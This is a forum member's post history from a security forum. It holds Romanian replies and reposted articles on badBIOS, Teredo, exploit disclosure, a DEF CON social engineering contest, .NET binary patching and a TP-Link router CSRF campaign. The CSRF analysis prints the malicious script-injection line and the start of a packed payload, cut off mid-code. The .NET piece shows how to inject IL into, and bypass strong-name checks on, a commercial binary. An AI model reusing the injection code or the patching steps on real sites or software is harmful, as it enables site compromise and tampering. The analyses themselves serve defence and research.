Jump to content

Nytro

Administrators
  • Posts

    18715
  • Joined

  • Last visited

  • Days Won

    701

Everything posted by Nytro

  1. PHP trebuie sa fie instalat ca cgi. Si nu prea e. Si daca e, e pe servere foarte vechi.
  2. Poate o sa par prost, dar ce sunt "Joint Ventures"?
  3. Nu arata rau deloc
  4. Nytro

    ShiftShared

    As prefera sa dati adresele de mail pe PM daca se poate. Spre binele vostru zic. Apoi, poate nu va dati si voi adresa de mail "personala". Spre binele vostru zic.
  5. Da, bravo, esti printre putinele persoane care mai fac cate ceva... Daca ai timp, chiar daca gasesti sursa pentru o anumita functionalitate, incearca sa o faci tu singur. Chiar daca intelegi perfect o sursa, nu este de ajuns pana nu scrii tu linie cu linie. Iti mai sugerez sa incerci C# sau chiar C++.
  6. Si zici ca ai facut tu "Remote Desktop"?
  7. Nytro

    Fun stuff

    E mult prea mic intervalul, pune cel putin cateva milisecunde, nu microsecunde. E foarte posibil ca mecanismul de thread schedueling sa dureze mai mult (task switch-ul, salvarea registrilor si schimbarea pe un alt thread). De asemenea: usleep(3) - Linux man page [h=2]Errors[/h] EINTR Interrupted by a signal; see signal(7). EINVAL usec is not smaller than 1000000. (On systems where that is considered an error.) 4.3BSD, POSIX.1-2001. POSIX.1-2001 declares this function obsolete; use nanosleep(2) instead. POSIX.1-2008 removes the specification of usleep(). Cel mai probabil system call-ul dureaza mai mult decat sleep-ul propriu-zis. Radem, glumim, dar suntem si seriosi
  8. Meet “badBIOS,” the mysterious Mac and PC malware that jumps airgaps Like a super strain of bacteria, the rootkit plaguing Dragos Ruiu is omnipotent. by Dan Goodin - Oct 31 2013 Aurich Lawson / Thinkstock Three years ago, security consultant Dragos Ruiu was in his lab when he noticed something highly unusual: his MacBook Air, on which he had just installed a fresh copy of OS X, spontaneously updated the firmware that helps it boot. Stranger still, when Ruiu then tried to boot the machine off a CD ROM, it refused. He also found that the machine could delete data and undo configuration changes with no prompting. He didn't know it then, but that odd firmware update would become a high-stakes malware mystery that would consume most of his waking hours. In the following months, Ruiu observed more odd phenomena that seemed straight out of a science-fiction thriller. A computer running the Open BSD operating system also began to modify its settings and delete its data without explanation or prompting. His network transmitted data specific to the Internet's next-generation IPv6 networking protocol, even from computers that were supposed to have IPv6 completely disabled. Strangest of all was the ability of infected machines to transmit small amounts of network data with other infected machines even when their power cords and Ethernet cables were unplugged and their Wi-Fi and Bluetooth cards were removed. Further investigation soon showed that the list of affected operating systems also included multiple variants of Windows and Linux. "We were like, 'Okay, we're totally owned,'" Ruiu told Ars. "'We have to erase all our systems and start from scratch,' which we did. It was a very painful exercise. I've been suspicious of stuff around here ever since." In the intervening three years, Ruiu said, the infections have persisted, almost like a strain of bacteria that's able to survive extreme antibiotic therapies. Within hours or weeks of wiping an infected computer clean, the odd behavior would return. The most visible sign of contamination is a machine's inability to boot off a CD, but other, more subtle behaviors can be observed when using tools such as Process Monitor, which is designed for troubleshooting and forensic investigations. Another intriguing characteristic: in addition to jumping "airgaps" designed to isolate infected or sensitive machines from all other networked computers, the malware seems to have self-healing capabilities. "We had an air-gapped computer that just had its [firmware] BIOS reflashed, a fresh disk drive installed, and zero data on it, installed from a Windows system CD," Ruiu said. "At one point, we were editing some of the components and our registry editor got disabled. It was like: wait a minute, how can that happen? How can the machine react and attack the software that we're using to attack it? This is an air-gapped machine and all of the sudden the search function in the registry editor stopped working when we were using it to search for their keys." Over the past two weeks, Ruiu has taken to Twitter, Facebook, and Google Plus to document his investigative odyssey and share a theory that has captured the attention of some of the world's foremost security experts. The malware, Ruiu believes, is transmitted though USB drives to infect the lowest levels of computer hardware. With the ability to target a computer's Basic Input/Output System (BIOS), Unified Extensible Firmware Interface (UEFI), and possibly other firmware standards, the malware can attack a wide variety of platforms, escape common forms of detection, and survive most attempts to eradicate it. But the story gets stranger still. In posts here, here, and here, Ruiu posited another theory that sounds like something from the screenplay of a post-apocalyptic movie: "badBIOS," as Ruiu dubbed the malware, has the ability to use high-frequency transmissions passed between computer speakers and microphones to bridge airgaps. Bigfoot in the age of the advanced persistent threat At times as I've reported this story, its outline has struck me as the stuff of urban legend, the advanced persistent threat equivalent of a Bigfoot sighting. Indeed, Ruiu has conceded that while several fellow security experts have assisted his investigation, none has peer reviewed his process or the tentative findings that he's beginning to draw. (A compilation of Ruiu's observations is here.) Also unexplained is why Ruiu would be on the receiving end of such an advanced and exotic attack. As a security professional, the organizer of the internationally renowned CanSecWest and PacSec conferences, and the founder of the Pwn2Own hacking competition, he is no doubt an attractive target to state-sponsored spies and financially motivated hackers. But he's no more attractive a target than hundreds or thousands of his peers, who have so far not reported the kind of odd phenomena that has afflicted Ruiu's computers and networks. In contrast to the skepticism that's common in the security and hacking cultures, Ruiu's peers have mostly responded with deep-seated concern and even fascination to his dispatches about badBIOS. "Everybody in security needs to follow @dragosr and watch his analysis of #badBIOS," Alex Stamos, one of the more trusted and sober security researchers, wrote in a tweet last week. Jeff Moss—the founder of the Defcon and Blackhat security conferences who in 2009 began advising Department of Homeland Security Secretary Janet Napolitano on matters of computer security—retweeted the statement and added: "No joke it's really serious." Plenty of others agree. "Dragos is definitely one of the good reliable guys, and I have never ever even remotely thought him dishonest," security researcher Arrigo Triulzi told Ars. "Nothing of what he describes is science fiction taken individually, but we have not seen it in the wild ever." Been there, done that Triulzi said he's seen plenty of firmware-targeting malware in the laboratory. A client of his once infected the UEFI-based BIOS of his Mac laptop as part of an experiment. Five years ago, Triulzi himself developed proof-of-concept malware that stealthily infected the network interface controllers that sit on a computer motherboard and provide the Ethernet jack that connects the machine to a network. His research built off of work by John Heasman that demonstrated how to plant hard-to-detect malware known as a rootkit in a computer's peripheral component interconnect, the Intel-developed connection that attaches hardware devices to a CPU. It's also possible to use high-frequency sounds broadcast over speakers to send network packets. Early networking standards used the technique, said security expert Rob Graham. Ultrasonic-based networking is also the subject of a great deal of research, including this project by scientists at MIT. Of course, it's one thing for researchers in the lab to demonstrate viable firmware-infecting rootkits and ultra high-frequency networking techniques. But as Triulzi suggested, it's another thing entirely to seamlessly fuse the two together and use the weapon in the real world against a seasoned security consultant. What's more, use of a USB stick to infect an array of computer platforms at the BIOS level rivals the payload delivery system found in the state-sponsored Stuxnet worm unleashed to disrupt Iran's nuclear program. And the reported ability of badBIOS to bridge airgaps also has parallels to Flame, another state-sponsored piece of malware that used Bluetooth radio signals to communicate with devices not connected to the Internet. "Really, everything Dragos reports is something that's easily within the capabilities of a lot of people," said Graham, who is CEO of penetration testing firm Errata Security. "I could, if I spent a year, write a BIOS that does everything Dragos said badBIOS is doing. To communicate over ultrahigh frequency sound waves between computers is really, really easy." Coincidentally, Italian newspapers this week reported that Russian spies attempted to monitor attendees of last month's G20 economic summit by giving them memory sticks and recharging cables programmed to intercept their communications. Eureka For most of the three years that Ruiu has been wrestling with badBIOS, its infection mechanism remained a mystery. A month or two ago, after buying a new computer, he noticed that it was almost immediately infected as soon as he plugged one of his USB drives into it. He soon theorized that infected computers have the ability to contaminate USB devices and vice versa. "The suspicion right now is there's some kind of buffer overflow in the way the BIOS is reading the drive itself, and they're reprogramming the flash controller to overflow the BIOS and then adding a section to the BIOS table," he explained. He still doesn't know if a USB stick was the initial infection trigger for his MacBook Air three years ago, or if the USB devices were infected only after they came into contact with his compromised machines, which he said now number between one and two dozen. He said he has been able to identify a variety of USB sticks that infect any computer they are plugged into. At next month's PacSec conference, Ruiu said he plans to get access to expensive USB analysis hardware that he hopes will provide new clues behind the infection mechanism. He said he suspects badBIOS is only the initial module of a multi-staged payload that has the ability to infect the Windows, Mac OS X, BSD, and Linux operating systems. Dragos Ruiu Julia Wolf "It's going out over the network to get something or it's going out to the USB key that it was infected from," he theorized. "That's also the conjecture of why it's not booting CDs. It's trying to keep its claws, as it were, on the machine. It doesn't want you to boot another OS it might not have code for." To put it another way, he said, badBIOS "is the tip of the warhead, as it were." “Things kept getting fixed” Ruiu said he arrived at the theory about badBIOS's high-frequency networking capability after observing encrypted data packets being sent to and from an infected laptop that had no obvious network connection with—but was in close proximity to—another badBIOS-infected computer. The packets were transmitted even when the laptop had its Wi-Fi and Bluetooth cards removed. Ruiu also disconnected the machine's power cord so it ran only on battery to rule out the possibility it was receiving signals over the electrical connection. Even then, forensic tools showed the packets continued to flow over the airgapped machine. Then, when Ruiu removed internal speaker and microphone connected to the airgapped machine, the packets suddenly stopped. With the speakers and mic intact, Ruiu said, the isolated computer seemed to be using the high-frequency connection to maintain the integrity of the badBIOS infection as he worked to dismantle software components the malware relied on. "The airgapped machine is acting like it's connected to the Internet," he said. "Most of the problems we were having is we were slightly disabling bits of the components of the system. It would not let us disable some things. Things kept getting fixed automatically as soon as we tried to break them. It was weird." It's too early to say with confidence that what Ruiu has been observing is a USB-transmitted rootkit that can burrow into a computer's lowest levels and use it as a jumping off point to infect a variety of operating systems with malware that can't be detected. It's even harder to know for sure that infected systems are using high-frequency sounds to communicate with isolated machines. But after almost two weeks of online discussion, no one has been able to rule out these troubling scenarios, either. "It looks like the state of the art in intrusion stuff is a lot more advanced than we assumed it was," Ruiu concluded in an interview. "The take-away from this is a lot of our forensic procedures are weak when faced with challenges like this. A lot of companies have to take a lot more care when they use forensic data if they're faced with sophisticated attackers." Sursa: Meet “badBIOS,” the mysterious Mac and PC malware that jumps airgaps | Ars Technica
  9. The Teredo Protocol: Tunneling Past Network Security and Other Security Implications Dr. James Hoagland Principal Security Researcher Symantec Advanced Threat Research Contents Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6 Overview: How Teredo works . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .7 Teredo components . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .7 Teredo setup . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .9 Teredo addresses . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .10 Origin data . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .10 Qualification procedure . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .11 Secure qualification . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .12 Bubble packets and creating a NAT hole . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .13 Packet relaying and peer setup for non-Teredo peers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .14 Finding a relay from IPv6 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .14 Ping test and finding a relay from IPv4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .15 Packet relaying and peer setup for Teredo peers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .16 Trusted state . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .16 Required packet filtering . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .17 Teredo security considerations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .18 Security of NAT types . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .18 Teredo’s open-ended tunnel (a.k.a. extra security burden on end host) . . . . . . . . . . . . . . . . . . . . . .19 Allowed packets . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .20 Teredo and IPv6 source routing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .21 IPv4 ingress filtering bypass . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .22 Teredo and bot networks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .22 Teredo implications on ability to reach a host through a NAT . . . . . . . . . . . . . . . . . . . . . . . . . . . .22 Information revealed to third parties . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .24 Symantec Advanced Threat Research The Teredo Protocol Tunneling Past Network Security and Other Security Implications Contents (cont’d) Teredo anti-spoofing measures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .24 Peer address spoofing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .25 Server spoofing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .26 Denial of Teredo service . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .26 Storage-based details . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .26 Relay DOS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .27 Server DOS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .27 Scanning Teredo addresses compared with native IPv6 addresses . . . . . . . . . . . . . . . . . . . . . . . . . .28 Finding a Teredo address for a host . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .28 Finding any Teredo address for an external IPv4 address . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .29 Finding any Teredo address on the Internet . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .29 Scanning difficulties compared . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .30 The effect of Teredo service on worms . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .30 Attack pieces . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .31 Getting Teredo components to send packets to third parties . . . . . . . . . . . . . . . . . . . . . . . . . . . . .31 Inducing a client to make external connections . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .31 Selecting a relay via source routing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .32 Finding the IPv4 side of an IPv6 node’s relay . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .32 Teredo mitigation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .32 Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .34 Future work . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .35 Acknowledgments . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .35 References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .36 Download: http://www.symantec.com/avcenter/reference/Teredo_Security.pdf
  10. Disclosure of Vulnerabilities and Exploit Code is an Essential Capability Posted by Darren Meyer in RESEARCH, October 30, 2013 Robert Lemos has an excellent summary of the state of the debate on disclosure of exploit code in his column at Dark Reading. In it, I’m quoted briefly: Software vulnerabilities are often discovered independently, suggesting that silencing the disclosure of a vulnerability and how to exploit the flaw would merely allow a bad actor more time to use an attack, says Darren Meyer, senior security researcher at Veracode, an application security firm. “It is really important for the disclosure, or even the release of code, to be a possibility,” he says. “The legal restraint of that would be a very bad practice.” But that’s really only part of the story — disclosure is a complicated topic. It’s easy to understand the point of view of a defender: details of a specific vulnerability or even example exploit code are scary. Their existence means you as a defender have a very short period of time to react, you have to prioritize that fix instead of rolling it into a planned update, because attackers now have a ready-made path to attack you. These concerns are exactly why Veracode takes such pains to keep the vulnerabilities we discover in our customers’ applications confidential. It’s just as easy to understand the point of view of a researcher: their reputations—and thus their livelihoods—depend upon their ability to discover and document vulnerabilities. If they can’t share this information, it becomes very hard for the community and industry to evaluate their abilities objectively. Additionally, the sharing of information about vulnerabilities is essential to advancing the state of the art of defense. We learn from each other, and we apply that knowledge to better defenses. Both sets of concerns are valid. It would be a detrimental to security if every vulnerability discovered were immediately disclosed along with a working exploit. It would be just as bad if researchers were constrained from ever sharing their findings. After all, we’re on the same side—we all want higher-quality software. Fortunately for us, there are various approaches to responsible disclosure, all of which have a few key attributes: The vulnerability is disclosed first to people who have the ability to repair it The details are kept confidential for a reasonable and agreed upon period of time to allow the vulnerable party to engineer and properly test and deploy a fix Once the vulnerability is fixed (or once a reasonable time to fix has passed), the researcher publishes the details This general framework for responsibly disclosing vulnerabilities strikes an excellent balance among the various concerns of defender, researcher, and user. The defender is given an opportunity to benefit from the researcher’s findings. But using this method also allows them to treat the vulnerability like other production defects: it can be appropriately prioritized, the fix can be engineered soundly, and the system can be thoroughly tested before the fix is deployed. Being able to treat a security flaw with the same QA measures as any other production defect results in higher-quality software. At the same time, unaffected defenders are able to learn from the mistakes of others and avoid them in their own systems. This makes everyone safer. The researcher retains his or her ability to share important findings with the research and defense communities, advancing the state of the art in research and defense and providing useful opportunities for further academic study. He or She also retains the leverage of disclosure as a way to ensure that the vulnerable party takes the issue seriously—the vulnerability will be disclosed, and so it must be repaired. Each user of the system comes out ahead as well. Ideally, they get to see that a vulnerability was discovered and repaired by learning about the vulnerability after the fix is already in place. And if not, they can trust that they’ll learn about a vulnerability that affects them should the defender fail in their duty to repair it.On top of that, the user benefits from the better defenses that result from information about vulnerabilities being publicly available. Responsible disclosure of vulnerabilities—including the details and even example exploits—simply works for everyone. Sursa: https://www.veracode.com/blog/2013/10/disclosure-of-vulnerabilities-and-exploit-code-is-an-essential-capability/
  11. The! DEFCON21 Social Engineer Capture The Flag Report Table&of&Contents&........................................................................................................................................................................&2! Executive&Summary&...................................................................................................................................................................&3! Overview&of&the&SECTF&............................................................................................................................................................&4! Background!and!Description!................................................................................................................!4! Description!of!the!2013!Parameters!....................................................................................................!6! Target!Companies!................................................................................................................................!6! Competitors!.........................................................................................................................................!7! Flags!.....................................................................................................................................................!7! Scoring!.................................................................................................................................................!9! Rules!of!Engagement!(R.O.E)!...............................................................................................................!9! Results?&Analysis&..............................................................................................................................................................&10! Open!Source!Information!Gathering!.................................................................................................!11! Pretexting!..........................................................................................................................................!14! Live!Call!Performance!........................................................................................................................!16! Final!Contest!Results!..........................................................................................................................!19! Discussion!..........................................................................................................................................!22! Mitigation!..........................................................................................................................................!23! 1.!Corporate!Information!Handling!and!Social!Media!Policies!..........................................................!23! 2.!Consistent,!Real!World!Education!.................................................................................................!24! 3.!Regular!Risk!Assessment!and!Penetration!Test!.............................................................................!24! About&SocialDEngineer,&Inc&..................................................................................................................................................&25! Sponsors&......................................................................................................................................................................................&26 Download: http://www.social-engineer.org/defcon21/DC21_SECTF_Final.pdf
  12. .NET: Binary Modification Walkthrough As I kept promising but failing to do, as I am an unregenerate procrastinator, here is a step-by-step of the binary modification I demonstrated during my Summercon, NordicSec, and Brucon talks. I chose Red Gate Reflector for my target app– partly for the “Yo dawg”/ Inception jokes, and partly because, as we’ll see later in this blog post, the folks at Red Gate seem to have a bit of a sense of humor about such things. As with most binaries you’ll end up working with, Reflector is obfuscated. The obfuscation used here is SmartAssembly– not surprising, since this is Red Gate’s obfuscation product. This is easily confirmed using de4dot deobfuscator: >de4dot.exe -d "C:\Program Files(x86)\Red Gate\.NET Reflector\Desktop 8.0\Reflector.exe" de4dot v2.0.3.3405 Copyright (C) 2011-2013 de4dot@gmail.com Latest version and source code: https://bitbucket.org/0xd4d/de4dot Detected SmartAssembly 6.6.0.147 (C:\Program Files (x86)\Red Gate\.NET Reflector\Desktop 8.0\Reflector.exe) Opening the binary in Reflector in its original state, we can clearly see signs of obfuscation. Symbols have been renamed to garbage characters and methods cannot be displayed. Some, however, have their original names. Well played, Red Gate. I dub this the “RedRoll.” Running the app through de4dot improves the readability somewhat and reverts the binary enough that methods can be resolved. However, since the original symbol data has not been stored, the deobfuscator is forced to assign generic names: Now that we have a deobfuscated binary, we can start to analyze and modify it. I’ve been relying on two add-ons to make this easier: CodeSearch (as Red Gate’s native search functionality is somewhat lacking,) and Reflexil (for assembly modification.) For this demonstration, I decided to modify Reflector to add some functionality that I felt was sorely lacking. My goal is to introduce new code into the binary and add a toolbar icon to launch it. Since we mostly have generic symbols to work with, it’s going to be a bit more of a challenge to identify where existing functionality is implemented as well as where to inject our own code. When analyzing a binary, it helps start with a list of goals, or at the very least touchpoints that you wish to reach. This list will undoubtedly change as you become more familiar with the app; however, it will help provide structure to your analysis. This especially helps if, like me, you tend to jump around haphazardly as new ideas pop in your head. For this particular undertaking, I fleshed out the following steps: Identify where toolbar icons are created and add icon representing the new functionality I’ll add Identify where toolbar icons are linked to the functionality/functions they invoke Insert an assembly reference to a DLL I’ve created into the application Create a new function inside Reflector invoking the functionality implemented in my DLL Link my tool icon to my own function Because symbol renaming was one of the obfuscation techniques performed on this binary, locating the toolbar implementation will require a little digging, but not much. By searching for one of the strings displayed when mousing over a toolbar icon, “Assembly Source Code…,” I was able to determine the toolbar is implemented in Class269.method_26(). Making an educated guess from the code above, the toolbar is created by various calls to Class269.method_29(), passing in the toolBar, the image icon, the mouse over text, keybindings, and a string referring to the function invoked when the icon is clicked. In order to add my own toolbar icon, I’ll need to add another of these calls. This can be done using Reflexil to inject the IL code equivalent, as seen below: The IL written to add the appropriate call is: IL_01ae: ldarg.0 IL_01af: ldarg.1 IL_01b0: call class [System.Drawing]System.Drawing.Image ns36.Class476::get_Nyan() IL_01b5: ldstr "Nyan!" IL_01ba: ldc.i4.0 IL_01bb: ldstr "Application.Nyan" IL_01c0: call instance void ns30.Class269::method_29(class Reflector.ICommandBar, class [System.Drawing]System.Drawing.Image, string, valuetype [System.Windows.Forms]System.Windows.Forms.Keys, string) IL_01c5: ldarg.1 IL_01c6: callvirt instance class Reflector.ICommandBarItemCollection Reflector.ICommandBar::get_Items() IL_01cb: callvirt instance class Reflector.ICommandBarSeparator Reflector.ICommandBarItemCollection::AddSeparator() IL_01d0: pop PROTIP: If you’re lost on what IL instructions to add, try writing a test app in C# or VB .NET, then use the Disassembly Window in Visual Studio or the IL view in Reflector to see the equivalent IL. You can see that in this IL, I make a call to ns36.Class476::get_Nyan(). This is a function that I’ll create that returns a System.Drawing.Image object representing the icon to be displayed in the toolbar. I’ll also need to find out where to associate the “Application.Nyan” string with the function that actually calls the functionality I wish to invoke. Doing a bit of digging into the Class476 functions, I end up determining that they are returning the images by slicing off 16×16 portions of CommandBar16.png. This means that I can add my toolbar icon to this image, which lives in the Resources section of the binary, and carve it off as well: I can then add the get_Nyan() function, modeling it off of the other image-carving functions in Class476. .method public hidebysig specialname static class [System.Drawing]System.Drawing.Image get_Nyan()cilmanaged { .maxstack 2 .locals init ( [0] class [System.Drawing]System.Drawing.Image image) L_0000: ldsfld class [System.Drawing]System.Drawing.Image[] ns36.Class476::image_0 L_0005: ldc.i4.s 40 L_0007: ldelem.ref L_0008: stloc.0 L_0009: leave.s L_000b L_000b: ldloc.0 L_000c: ret } With that done, I need to find where those pesky strings are linked to actual function calls. By searching for one of the strings (“Application.OpenFile,”) I find it referenced in two functions that look promising– Execute() and QueryStatus() Looking inside Class269.Execute, I see that this function creates a dictionary mapping these strings to function calls. public void Execute(string commandName) { string key = commandName; if (key != null) { int num; if (Class722.dictionary_4 == null) { Dictionary<string, int> dictionary1 = new Dictionary<string, int>(0x10); dictionary1.Add("Application.OpenFile", 0); dictionary1.Add("Application.OpenCache", 1); dictionary1.Add("Application.OpenList", 2); dictionary1.Add("Application.CloseFile", 3); … Class722.dictionary_4 = dictionary1; } if (Class722.dictionary_4.TryGetValue(key, out num)) { switch (num) { case 0: this.method_45(); break; case 1: this.method_46(); break; case 2: this.method_47(); break; … } QueryStatus() is structured in much the same way. I add my own dictionary entry mapping “Application.Nyan” to the function nyan() with the following IL to add the dictionary key… IL_00d5: dup IL_00d6: ldstr "Application.Nyan" IL_00db: ldc.i4.s 16 IL_00dd: call instance void class [mscorlib]System.Collections.Generic.Dictionary`2<string, int32>::Add(!0, !1) …and the function mapping: IL_01c0: ldarg.0 IL_01c1: call instance void ns30.Class269::nyan() IL_01c6: leave.s IL_01c8 You’ll notice above that I reference a function called nyan(). This is the function I’ll use that will implement the functionality the icon click will invoke. I could write this functionality entirely in IL, but I’m actually not much of a masochist. What I decided to do instead was to write a DLL containing the functionality I wanted. This assembly, derp.dll, was added as an assembly reference as follows: I can then insert IL for the nyan() function into Class269: .method private hidebysig instance void nyan() cil managed { .maxstack 8 L_0000: newobj instance void [derp]derp.hurr::.ctor() L_0005: callvirt instance void [derp]derp.hurr::showForm() L_000a: ret } This is about all the modification needed, but now I need to address the Strong Name Signing on the binary, otherwise I will not be able to save and execute these changes. There are various tutorials on this subject, but for the purposes of this project I simply enabled Strong Name bypass for this application, as is described here. Reflexil will also allow you to do this upon saving the modified binary. With the binary saved, I can now launch it. Now, if anything has been done incorrectly, your application will crash with a .NET runtime error either when you launch it or when trying to invoke the new functionality. For this reason, I saved my work and checked that it executed properly periodically throughout the process above. Below shows my new toolbar icon and the result of clicking it: I feel that Nyan mode greatly enhances the Reflector user experience and hope that RedGate will consider adding it to a future release. Sursa: .NET: Binary Modification Walkthrough | I am not interesting enough to have a blog.
  13. Real-World CSRF attack hijacks DNS Server configuration of TP-Link routers Introduction Analysis of the exploit Analysis of the CSRF payload Consequences of a malicious DNS server Prevalence of the exploit Recommendations to mitigate the problem Affected Devices References Introduction Today the majority of wired Internet connections is used with an embedded NAT router, which allows using the same Internet connection with several devices in parallel and also provides some protection against incoming attacks from the Internet. Most of these routers can be configured via a web interface. Unfortunately many of these web interfaces suffer from common web application vulnerabilities such as CSRF, XSS, insecure authentication and session management or command injection. In the past years countless vulnerabilities have been discovered and publicly reported. Many of them have remained unpatched by vendors and even if a patch is available, it is typically only installed to a small fraction of the affected devices. Despite these widespread vulnerabilities there have been very few public reports of real-world attacks against routers so far. This article exposes an active exploitation campaign against a known CSRF vulnerability (CVE-2013-2645) in various TP-Link routers. When a user visits a compromised website, the exploit tries to change the upstream DNS server of the router to an attacker-controlled IP address, which can then be used to carry out man-in-the-middle attacks. Analysis of the exploit This section describes one occurrence of the exploit. I have seen five different instances of the exploit on unrelated websites so far and the details of the obfuscation differ between them. However, the actual requests generated by the exploits are the same except for the DNS server IP addresses. As you would expect for malicious content added to a website the exploit is hidden in obfuscated javascript code. The first step is a line of javascript appended to a legitimate javascript file used by the website: document.write("<script type=\"text/javascript\" src=\"http://www.[REDACTED].com/js/ma.js\">"); It is possible that the cybercrooks append this line to various javascript files on compromised web servers in an automated way. This code just dynamically adds a new script tag to the website in order to load further javascript code from an external server. The referenced file “ma.js” contains the following encoded javascript code: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('T 